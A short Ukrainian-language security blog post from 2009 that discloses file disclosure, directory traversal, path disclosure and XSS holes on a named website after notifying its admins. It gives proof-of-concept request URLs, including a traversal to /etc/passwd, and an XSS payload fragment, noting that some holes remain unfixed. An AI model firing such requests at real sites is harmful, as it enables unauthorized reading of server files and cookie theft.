Websecurity - Веб безпека

06.06.2009

У вересні, 18.09.2008, а також додатково сьогодні, я знайшов Arbitrary File Disclosure, Directory Traversal, Full path disclosure та Cross-Site Scripting уразливості на проекті http://www.ejls.eu. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

04.09.2009

Arbitrary File Disclosure:

http://www.ejls.eu/download.php?file=download.php

Directory Traversal:

http://www.ejls.eu/download.php?file=../etc/passwd

Ці дві дірки вже виправлені.

Full path disclosure:

http://www.ejls.eu/load.php?action=1

XSS:

• alert(document.cookie)
• цікавий
• html включення

Половина з даних уразливостей досі не виправлена.

This entry was posted on 22:44 04.09.2009 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.